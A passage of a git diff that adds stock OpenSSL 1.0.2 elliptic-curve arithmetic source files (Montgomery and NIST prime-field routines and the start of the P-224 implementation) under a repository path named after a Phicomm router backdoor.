+    return BN_mod_mul_montgomery(r, a, a, group->field_data1, ctx);
+}
+
+int ec_GFp_mont_field_encode(const EC_GROUP *group, BIGNUM *r,
+                             const BIGNUM *a, BN_CTX *ctx)
+{
+    if (group->field_data1 == NULL) {
+        ECerr(EC_F_EC_GFP_MONT_FIELD_ENCODE, EC_R_NOT_INITIALIZED);
+        return 0;
+    }
+
+    return BN_to_montgomery(r, a, (BN_MONT_CTX *)group->field_data1, ctx);
+}
+
+int ec_GFp_mont_field_decode(const EC_GROUP *group, BIGNUM *r,
+                             const BIGNUM *a, BN_CTX *ctx)
+{
+    if (group->field_data1 == NULL) {
+        ECerr(EC_F_EC_GFP_MONT_FIELD_DECODE, EC_R_NOT_INITIALIZED);
+        return 0;
+    }
+
+    return BN_from_montgomery(r, a, group->field_data1, ctx);
+}
+
+int ec_GFp_mont_field_set_to_one(const EC_GROUP *group, BIGNUM *r,
+                                 BN_CTX *ctx)
+{
+    if (group->field_data2 == NULL) {
+        ECerr(EC_F_EC_GFP_MONT_FIELD_SET_TO_ONE, EC_R_NOT_INITIALIZED);
+        return 0;
+    }
+
+    if (!BN_copy(r, group->field_data2))
+        return 0;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nist.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nist.c
new file mode 100644
index 0000000..3944e24
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nist.c
@@ -0,0 +1,220 @@
+/* crypto/ec/ecp_nist.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions of this software developed by SUN MICROSYSTEMS, INC.,
+ * and contributed to the OpenSSL project.
+ */
+
+#include <limits.h>
+
+#include <openssl/err.h>
+#include <openssl/obj_mac.h>
+#include "ec_lcl.h"
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const EC_METHOD *EC_GFp_nist_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_simple_group_init,
+        ec_GFp_simple_group_finish,
+        ec_GFp_simple_group_clear_finish,
+        ec_GFp_nist_group_copy,
+        ec_GFp_nist_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_simple_point_get_affine_coordinates,
+        0, 0, 0,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        0 /* mul */ ,
+        0 /* precompute_mult */ ,
+        0 /* have_precompute_mult */ ,
+        ec_GFp_nist_field_mul,
+        ec_GFp_nist_field_sqr,
+        0 /* field_div */ ,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return fips_ec_gfp_nist_method();
+#endif
+
+    return &ret;
+}
+
+int ec_GFp_nist_group_copy(EC_GROUP *dest, const EC_GROUP *src)
+{
+    dest->field_mod_func = src->field_mod_func;
+
+    return ec_GFp_simple_group_copy(dest, src);
+}
+
+int ec_GFp_nist_group_set_curve(EC_GROUP *group, const BIGNUM *p,
+                                const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp_bn;
+
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+
+    BN_CTX_start(ctx);
+    if ((tmp_bn = BN_CTX_get(ctx)) == NULL)
+        goto err;
+
+    if (BN_ucmp(BN_get0_nist_prime_192(), p) == 0)
+        group->field_mod_func = BN_nist_mod_192;
+    else if (BN_ucmp(BN_get0_nist_prime_224(), p) == 0)
+        group->field_mod_func = BN_nist_mod_224;
+    else if (BN_ucmp(BN_get0_nist_prime_256(), p) == 0)
+        group->field_mod_func = BN_nist_mod_256;
+    else if (BN_ucmp(BN_get0_nist_prime_384(), p) == 0)
+        group->field_mod_func = BN_nist_mod_384;
+    else if (BN_ucmp(BN_get0_nist_prime_521(), p) == 0)
+        group->field_mod_func = BN_nist_mod_521;
+    else {
+        ECerr(EC_F_EC_GFP_NIST_GROUP_SET_CURVE, EC_R_NOT_A_NIST_PRIME);
+        goto err;
+    }
+
+    ret = ec_GFp_simple_group_set_curve(group, p, a, b, ctx);
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_nist_field_mul(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *ctx_new = NULL;
+
+    if (!group || !r || !a || !b) {
+        ECerr(EC_F_EC_GFP_NIST_FIELD_MUL, ERR_R_PASSED_NULL_PARAMETER);
+        goto err;
+    }
+    if (!ctx)
+        if ((ctx_new = ctx = BN_CTX_new()) == NULL)
+            goto err;
+
+    if (!BN_mul(r, a, b, ctx))
+        goto err;
+    if (!group->field_mod_func(r, r, &group->field, ctx))
+        goto err;
+
+    ret = 1;
+ err:
+    if (ctx_new)
+        BN_CTX_free(ctx_new);
+    return ret;
+}
+
+int ec_GFp_nist_field_sqr(const EC_GROUP *group, BIGNUM *r, const BIGNUM *a,
+                          BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *ctx_new = NULL;
+
+    if (!group || !r || !a) {
+        ECerr(EC_F_EC_GFP_NIST_FIELD_SQR, EC_R_PASSED_NULL_PARAMETER);
+        goto err;
+    }
+    if (!ctx)
+        if ((ctx_new = ctx = BN_CTX_new()) == NULL)
+            goto err;
+
+    if (!BN_sqr(r, a, ctx))
+        goto err;
+    if (!group->field_mod_func(r, r, &group->field, ctx))
+        goto err;
+
+    ret = 1;
+ err:
+    if (ctx_new)
+        BN_CTX_free(ctx_new);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp224.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp224.c
new file mode 100644
index 0000000..9a59ef0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp224.c
@@ -0,0 +1,1769 @@
+/* crypto/ec/ecp_nistp224.c */
+/*
+ * Written by Emilia Kasper (Google) for the OpenSSL project.
+ */
+/* Copyright 2011 Google Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ *
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *  Unless required by applicable law or agreed to in writing, software
+ *  distributed under the License is distributed on an "AS IS" BASIS,
+ *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *  See the License for the specific language governing permissions and
+ *  limitations under the License.
+ */
+
+/*
+ * A 64-bit implementation of the NIST P-224 elliptic curve point multiplication
+ *
+ * Inspired by Daniel J. Bernstein's public domain nistp224 implementation
+ * and Adam Langley's public domain 64-bit C implementation of curve25519
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+
+# ifndef OPENSSL_SYS_VMS
+#  include <stdint.h>
+# else
+#  include <inttypes.h>
+# endif
+
+# include <string.h>
+# include <openssl/err.h>
+# include "ec_lcl.h"
+
+# if defined(__GNUC__) && (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 1))
+  /* even with gcc, the typedef won't work for 32-bit platforms */
+typedef __uint128_t uint128_t;  /* nonstandard; implemented by gcc on 64-bit
+                                 * platforms */
+# else
+#  error "Need GCC 3.1 or later to define type uint128_t"
+# endif
+
+typedef uint8_t u8;
+typedef uint64_t u64;
+typedef int64_t s64;
+
+/******************************************************************************/
+/*-
+ * INTERNAL REPRESENTATION OF FIELD ELEMENTS
+ *
+ * Field elements are represented as a_0 + 2^56*a_1 + 2^112*a_2 + 2^168*a_3
+ * using 64-bit coefficients called 'limbs',
+ * and sometimes (for multiplication results) as
+ * b_0 + 2^56*b_1 + 2^112*b_2 + 2^168*b_3 + 2^224*b_4 + 2^280*b_5 + 2^336*b_6
+ * using 128-bit coefficients called 'widelimbs'.
+ * A 4-limb representation is an 'felem';
+ * a 7-widelimb representation is a 'widefelem'.
+ * Even within felems, bits of adjacent limbs overlap, and we don't always
+ * reduce the representations: we ensure that inputs to each felem
+ * multiplication satisfy a_i < 2^60, so outputs satisfy b_i < 4*2^60*2^60,
+ * and fit into a 128-bit word without overflow. The coefficients are then
+ * again partially reduced to obtain an felem satisfying a_i < 2^57.
+ * We only reduce to the unique minimal representation at the end of the
+ * computation.
+ */
+
+typedef uint64_t limb;
+typedef uint128_t widelimb;
+
+typedef limb felem[4];
+typedef widelimb widefelem[7];
+
+/*
+ * Field element represented as a byte arrary. 28*8 = 224 bits is also the
+ * group order size for the elliptic curve, and we also use this type for
+ * scalars for point multiplication.
+ */
+typedef u8 felem_bytearray[28];
+
+static const felem_bytearray nistp224_curve_params[5] = {
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, /* p */
+     0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, /* a */
+     0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0xFF, 0xFF,
+     0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFE},
+    {0xB4, 0x05, 0x0A, 0x85, 0x0C, 0x04, 0xB3, 0xAB, 0xF5, 0x41, /* b */
+     0x32, 0x56, 0x50, 0x44, 0xB0, 0xB7, 0xD7, 0xBF, 0xD8, 0xBA,
+     0x27, 0x0B, 0x39, 0x43, 0x23, 0x55, 0xFF, 0xB4},
+    {0xB7, 0x0E, 0x0C, 0xBD, 0x6B, 0xB4, 0xBF, 0x7F, 0x32, 0x13, /* x */
+     0x90, 0xB9, 0x4A, 0x03, 0xC1, 0xD3, 0x56, 0xC2, 0x11, 0x22,
+     0x34, 0x32, 0x80, 0xD6, 0x11, 0x5C, 0x1D, 0x21},
+    {0xbd, 0x37, 0x63, 0x88, 0xb5, 0xf7, 0x23, 0xfb, 0x4c, 0x22, /* y */
+     0xdf, 0xe6, 0xcd, 0x43, 0x75, 0xa0, 0x5a, 0x07, 0x47, 0x64,
+     0x44, 0xd5, 0x81, 0x99, 0x85, 0x00, 0x7e, 0x34}
+};
+
+/*-
+ * Precomputed multiples of the standard generator
+ * Points are given in coordinates (X, Y, Z) where Z normally is 1
+ * (0 for the point at infinity).
+ * For each field element, slice a_0 is word 0, etc.
+ *
+ * The table has 2 * 16 elements, starting with the following:
+ * index | bits    | point
+ * ------+---------+------------------------------
+ *     0 | 0 0 0 0 | 0G
+ *     1 | 0 0 0 1 | 1G
+ *     2 | 0 0 1 0 | 2^56G
+ *     3 | 0 0 1 1 | (2^56 + 1)G
+ *     4 | 0 1 0 0 | 2^112G
+ *     5 | 0 1 0 1 | (2^112 + 1)G
+ *     6 | 0 1 1 0 | (2^112 + 2^56)G
+ *     7 | 0 1 1 1 | (2^112 + 2^56 + 1)G
+ *     8 | 1 0 0 0 | 2^168G
+ *     9 | 1 0 0 1 | (2^168 + 1)G
+ *    10 | 1 0 1 0 | (2^168 + 2^56)G
+ *    11 | 1 0 1 1 | (2^168 + 2^56 + 1)G
+ *    12 | 1 1 0 0 | (2^168 + 2^112)G
+ *    13 | 1 1 0 1 | (2^168 + 2^112 + 1)G
+ *    14 | 1 1 1 0 | (2^168 + 2^112 + 2^56)G
+ *    15 | 1 1 1 1 | (2^168 + 2^112 + 2^56 + 1)G
+ * followed by a copy of this with each element multiplied by 2^28.
+ *
+ * The reason for this is so that we can clock bits into four different
+ * locations when doing simple scalar multiplies against the base point,
+ * and then another four locations using the second 16 elements.
+ */
+static const felem gmul[2][16][3] = { {{{0, 0, 0, 0},
+                                        {0, 0, 0, 0},
+                                        {0, 0, 0, 0}},
+                                       {{0x3280d6115c1d21, 0xc1d356c2112234,
+                                         0x7f321390b94a03, 0xb70e0cbd6bb4bf},
+                                        {0xd5819985007e34, 0x75a05a07476444,
+                                         0xfb4c22dfe6cd43, 0xbd376388b5f723},
+                                        {1, 0, 0, 0}},
+                                       {{0xfd9675666ebbe9, 0xbca7664d40ce5e,
+                                         0x2242df8d8a2a43, 0x1f49bbb0f99bc5},
+                                        {0x29e0b892dc9c43, 0xece8608436e662,
+                                         0xdc858f185310d0, 0x9812dd4eb8d321},
+                                        {1, 0, 0, 0}},
+                                       {{0x6d3e678d5d8eb8, 0x559eed1cb362f1,
+                                         0x16e9a3bbce8a3f, 0xeedcccd8c2a748},
+                                        {0xf19f90ed50266d, 0xabf2b4bf65f9df,
+                                         0x313865468fafec, 0x5cb379ba910a17},
+                                        {1, 0, 0, 0}},
+                                       {{0x0641966cab26e3, 0x91fb2991fab0a0,
+                                         0xefec27a4e13a0b, 0x0499aa8a5f8ebe},
+                                        {0x7510407766af5d, 0x84d929610d5450,
+                                         0x81d77aae82f706, 0x6916f6d4338c5b},
+                                        {1, 0, 0, 0}},
+                                       {{0xea95ac3b1f15c6, 0x086000905e82d4,
+                                         0xdd323ae4d1c8b1, 0x932b56be7685a3},
+                                        {0x9ef93dea25dbbf, 0x41665960f390f0,
+                                         0xfdec76dbe2a8a7, 0x523e80f019062a},
+                                        {1, 0, 0, 0}},
+                                       {{0x822fdd26732c73, 0xa01c83531b5d0f,
+                                         0x363f37347c1ba4, 0xc391b45c84725c},
+                                        {0xbbd5e1b2d6ad24, 0xddfbcde19dfaec,
+                                         0xc393da7e222a7f, 0x1efb7890ede244},
+                                        {1, 0, 0, 0}},
+                                       {{0x4c9e90ca217da1, 0xd11beca79159bb,
+                                         0xff8d33c2c98b7c, 0x2610b39409f849},
+                                        {0x44d1352ac64da0, 0xcdbb7b2c46b4fb,
+                                         0x966c079b753c89, 0xfe67e4e820b112},
+                                        {1, 0, 0, 0}},
+                                       {{0xe28cae2df5312d, 0xc71b61d16f5c6e,
+                                         0x79b7619a3e7c4c, 0x05c73240899b47},
+                                        {0x9f7f6382c73e3a, 0x18615165c56bda,
+                                         0x641fab2116fd56, 0x72855882b08394},
+                                        {1, 0, 0, 0}},
+                                       {{0x0469182f161c09, 0x74a98ca8d00fb5,
+                                         0xb89da93489a3e0, 0x41c98768fb0c1d},
+                                        {0xe5ea05fb32da81, 0x3dce9ffbca6855,
+                                         0x1cfe2d3fbf59e6, 0x0e5e03408738a7},
+                                        {1, 0, 0, 0}},
+                                       {{0xdab22b2333e87f, 0x4430137a5dd2f6,
+                                         0xe03ab9f738beb8, 0xcb0c5d0dc34f24},
+                                        {0x764a7df0c8fda5, 0x185ba5c3fa2044,
+                                         0x9281d688bcbe50, 0xc40331df893881},
+                                        {1, 0, 0, 0}},
+                                       {{0xb89530796f0f60, 0xade92bd26909a3,
+                                         0x1a0c83fb4884da, 0x1765bf22a5a984},
+                                        {0x772a9ee75db09e, 0x23bc6c67cec16f,
+                                         0x4c1edba8b14e2f, 0xe2a215d9611369},
+                                        {1, 0, 0, 0}},
+                                       {{0x571e509fb5efb3, 0xade88696410552,
+                                         0xc8ae85fada74fe, 0x6c7e4be83bbde3},
+                                        {0xff9f51160f4652, 0xb47ce2495a6539,
+                                         0xa2946c53b582f4, 0x286d2db3ee9a60},
+                                        {1, 0, 0, 0}},
+                                       {{0x40bbd5081a44af, 0x0995183b13926c,
+                                         0xbcefba6f47f6d0, 0x215619e9cc0057},
+                                        {0x8bc94d3b0df45e, 0xf11c54a3694f6f,
+                                         0x8631b93cdfe8b5, 0xe7e3f4b0982db9},
+                                        {1, 0, 0, 0}},
+                                       {{0xb17048ab3e1c7b, 0xac38f36ff8a1d8,
+                                         0x1c29819435d2c6, 0xc813132f4c07e9},
+                                        {0x2891425503b11f, 0x08781030579fea,
+                                         0xf5426ba5cc9674, 0x1e28ebf18562bc},
+                                        {1, 0, 0, 0}},
+                                       {{0x9f31997cc864eb, 0x06cd91d28b5e4c,
+                                         0xff17036691a973, 0xf1aef351497c58},
+                                        {0xdd1f2d600564ff, 0xdead073b1402db,
+                                         0x74a684435bd693, 0xeea7471f962558},
+                                        {1, 0, 0, 0}}},
+{{{0, 0, 0, 0},
+  {0, 0, 0, 0},
+  {0, 0, 0, 0}},
+ {{0x9665266dddf554, 0x9613d78b60ef2d, 0xce27a34cdba417, 0xd35ab74d6afc31},
+  {0x85ccdd22deb15e, 0x2137e5783a6aab, 0xa141cffd8c93c6, 0x355a1830e90f2d},
+  {1, 0, 0, 0}},
+ {{0x1a494eadaade65, 0xd6da4da77fe53c, 0xe7992996abec86, 0x65c3553c6090e3},
+  {0xfa610b1fb09346, 0xf1c6540b8a4aaf, 0xc51a13ccd3cbab, 0x02995b1b18c28a},
+  {1, 0, 0, 0}},
+ {{0x7874568e7295ef, 0x86b419fbe38d04, 0xdc0690a7550d9a, 0xd3966a44beac33},
+  {0x2b7280ec29132f, 0xbeaa3b6a032df3, 0xdc7dd88ae41200, 0xd25e2513e3a100},
+  {1, 0, 0, 0}},
+ {{0x924857eb2efafd, 0xac2bce41223190, 0x8edaa1445553fc, 0x825800fd3562d5},
+  {0x8d79148ea96621, 0x23a01c3dd9ed8d, 0xaf8b219f9416b5, 0xd8db0cc277daea},
+  {1, 0, 0, 0}},
+ {{0x76a9c3b1a700f0, 0xe9acd29bc7e691, 0x69212d1a6b0327, 0x6322e97fe154be},
+  {0x469fc5465d62aa, 0x8d41ed18883b05, 0x1f8eae66c52b88, 0xe4fcbe9325be51},
+  {1, 0, 0, 0}},
+ {{0x825fdf583cac16, 0x020b857c7b023a, 0x683c17744b0165, 0x14ffd0a2daf2f1},
+  {0x323b36184218f9, 0x4944ec4e3b47d4, 0xc15b3080841acf, 0x0bced4b01a28bb},
+  {1, 0, 0, 0}},
+ {{0x92ac22230df5c4, 0x52f33b4063eda8, 0xcb3f19870c0c93, 0x40064f2ba65233},
+  {0xfe16f0924f8992, 0x012da25af5b517, 0x1a57bb24f723a6, 0x06f8bc76760def},
+  {1, 0, 0, 0}},
+ {{0x4a7084f7817cb9, 0xbcab0738ee9a78, 0x3ec11e11d9c326, 0xdc0fe90e0f1aae},
+  {0xcf639ea5f98390, 0x5c350aa22ffb74, 0x9afae98a4047b7, 0x956ec2d617fc45},
+  {1, 0, 0, 0}},
+ {{0x4306d648c1be6a, 0x9247cd8bc9a462, 0xf5595e377d2f2e, 0xbd1c3caff1a52e},
+  {0x045e14472409d0, 0x29f3e17078f773, 0x745a602b2d4f7d, 0x191837685cdfbb},
+  {1, 0, 0, 0}},
+ {{0x5b6ee254a8cb79, 0x4953433f5e7026, 0xe21faeb1d1def4, 0xc4c225785c09de},
+  {0x307ce7bba1e518, 0x31b125b1036db8, 0x47e91868839e8f, 0xc765866e33b9f3},
+  {1, 0, 0, 0}},
+ {{0x3bfece24f96906, 0x4794da641e5093, 0xde5df64f95db26, 0x297ecd89714b05},
+  {0x701bd3ebb2c3aa, 0x7073b4f53cb1d5, 0x13c5665658af16, 0x9895089d66fe58},
+  {1, 0, 0, 0}},
+ {{0x0fef05f78c4790, 0x2d773633b05d2e, 0x94229c3a951c94, 0xbbbd70df4911bb},
+  {0xb2c6963d2c1168, 0x105f47a72b0d73, 0x9fdf6111614080, 0x7b7e94b39e67b0},
+  {1, 0, 0, 0}},
+ {{0xad1a7d6efbe2b3, 0xf012482c0da69d, 0x6b3bdf12438345, 0x40d7558d7aa4d9},
+  {0x8a09fffb5c6d3d, 0x9a356e5d9ffd38, 0x5973f15f4f9b1c, 0xdcd5f59f63c3ea},
+  {1, 0, 0, 0}},
+ {{0xacf39f4c5ca7ab, 0x4c8071cc5fd737, 0xc64e3602cd1184, 0x0acd4644c9abba},
+  {0x6c011a36d8bf6e, 0xfecd87ba24e32a, 0x19f6f56574fad8, 0x050b204ced9405},
+  {1, 0, 0, 0}},
+ {{0xed4f1cae7d9a96, 0x5ceef7ad94c40a, 0x778e4a3bf3ef9b, 0x7405783dc3b55e},
+  {0x32477c61b6e8c6, 0xb46a97570f018b, 0x91176d0a7e95d1, 0x3df90fbc4c7d0e},
+  {1, 0, 0, 0}}}
+};
+
+/* Precomputation for the group generator. */
+typedef struct {
+    felem g_pre_comp[2][16][3];
+    int references;
+} NISTP224_PRE_COMP;
+
+const EC_METHOD *EC_GFp_nistp224_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_nistp224_group_init,
+        ec_GFp_simple_group_finish,
+        ec_GFp_simple_group_clear_finish,
+        ec_GFp_nist_group_copy,
+        ec_GFp_nistp224_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_nistp224_point_get_affine_coordinates,
+        0 /* point_set_compressed_coordinates */ ,
+        0 /* point2oct */ ,
+        0 /* oct2point */ ,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        ec_GFp_nistp224_points_mul,
+        ec_GFp_nistp224_precompute_mult,
+        ec_GFp_nistp224_have_precompute_mult,
+        ec_GFp_nist_field_mul,
+        ec_GFp_nist_field_sqr,
+        0 /* field_div */ ,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+    return &ret;
+}
+
+/*
+ * Helper functions to convert field elements to/from internal representation
+ */
+static void bin28_to_felem(felem out, const u8 in[28])
+{
+    out[0] = *((const uint64_t *)(in)) & 0x00ffffffffffffff;
+    out[1] = (*((const uint64_t *)(in + 7))) & 0x00ffffffffffffff;
+    out[2] = (*((const uint64_t *)(in + 14))) & 0x00ffffffffffffff;
+    out[3] = (*((const uint64_t *)(in + 21))) & 0x00ffffffffffffff;
+}
+
+static void felem_to_bin28(u8 out[28], const felem in)
+{
+    unsigned i;
+    for (i = 0; i < 7; ++i) {
+        out[i] = in[0] >> (8 * i);
+        out[i + 7] = in[1] >> (8 * i);
+        out[i + 14] = in[2] >> (8 * i);
+        out[i + 21] = in[3] >> (8 * i);
+    }
+}
+
+/* To preserve endianness when using BN_bn2bin and BN_bin2bn */
+static void flip_endian(u8 *out, const u8 *in, unsigned len)
+{
+    unsigned i;
+    for (i = 0; i < len; ++i)
+        out[i] = in[len - 1 - i];
+}
+
+/* From OpenSSL BIGNUM to internal representation */
+static int BN_to_felem(felem out, const BIGNUM *bn)
+{
+    felem_bytearray b_in;
+    felem_bytearray b_out;
+    unsigned num_bytes;
+
+    /* BN_bn2bin eats leading zeroes */
+    memset(b_out, 0, sizeof b_out);
+    num_bytes = BN_num_bytes(bn);
+    if (num_bytes > sizeof b_out) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    if (BN_is_negative(bn)) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    num_bytes = BN_bn2bin(bn, b_in);
+    flip_endian(b_out, b_in, num_bytes);
+    bin28_to_felem(out, b_out);
+    return 1;
+}
+
+/* From internal representation to OpenSSL BIGNUM */
+static BIGNUM *felem_to_BN(BIGNUM *out, const felem in)
+{
+    felem_bytearray b_in, b_out;
+    felem_to_bin28(b_in, in);
+    flip_endian(b_out, b_in, sizeof b_out);
+    return BN_bin2bn(b_out, sizeof b_out, out);
+}
+
+/******************************************************************************/
+/*-
+ *                              FIELD OPERATIONS
+ *
+ * Field operations, using the internal representation of field elements.
+ * NB! These operations are specific to our point multiplication and cannot be
+ * expected to be correct in general - e.g., multiplication with a large scalar
+ * will cause an overflow.
+ *
+ */
+
+static void felem_one(felem out)
+{
+    out[0] = 1;
+    out[1] = 0;
+    out[2] = 0;
+    out[3] = 0;
+}
+
+static void felem_assign(felem out, const felem in)
+{
+    out[0] = in[0];
+    out[1] = in[1];
+    out[2] = in[2];
+    out[3] = in[3];
+}
+
+/* Sum two field elements: out += in */
+static void felem_sum(felem out, const felem in)
+{
+    out[0] += in[0];
+    out[1] += in[1];
+    out[2] += in[2];
+    out[3] += in[3];
+}
+
+/* Get negative value: out = -in */
+/* Assumes in[i] < 2^57 */
+static void felem_neg(felem out, const felem in)
+{
+    static const limb two58p2 = (((limb) 1) << 58) + (((limb) 1) << 2);
+    static const limb two58m2 = (((limb) 1) << 58) - (((limb) 1) << 2);
+    static const limb two58m42m2 = (((limb) 1) << 58) -
+        (((limb) 1) << 42) - (((limb) 1) << 2);
+
+    /* Set to 0 mod 2^224-2^96+1 to ensure out > in */
+    out[0] = two58p2 - in[0];
+    out[1] = two58m42m2 - in[1];
+    out[2] = two58m2 - in[2];
+    out[3] = two58m2 - in[3];
+}
+
+/* Subtract field elements: out -= in */
+/* Assumes in[i] < 2^57 */
+static void felem_diff(felem out, const felem in)
+{
+    static const limb two58p2 = (((limb) 1) << 58) + (((limb) 1) << 2);
+    static const limb two58m2 = (((limb) 1) << 58) - (((limb) 1) << 2);
+    static const limb two58m42m2 = (((limb) 1) << 58) -
+        (((limb) 1) << 42) - (((limb) 1) << 2);
+
+    /* Add 0 mod 2^224-2^96+1 to ensure out > in */
+    out[0] += two58p2;
+    out[1] += two58m42m2;
+    out[2] += two58m2;
+    out[3] += two58m2;
+
+    out[0] -= in[0];
+    out[1] -= in[1];
+    out[2] -= in[2];
+    out[3] -= in[3];
+}
+
+/* Subtract in unreduced 128-bit mode: out -= in */
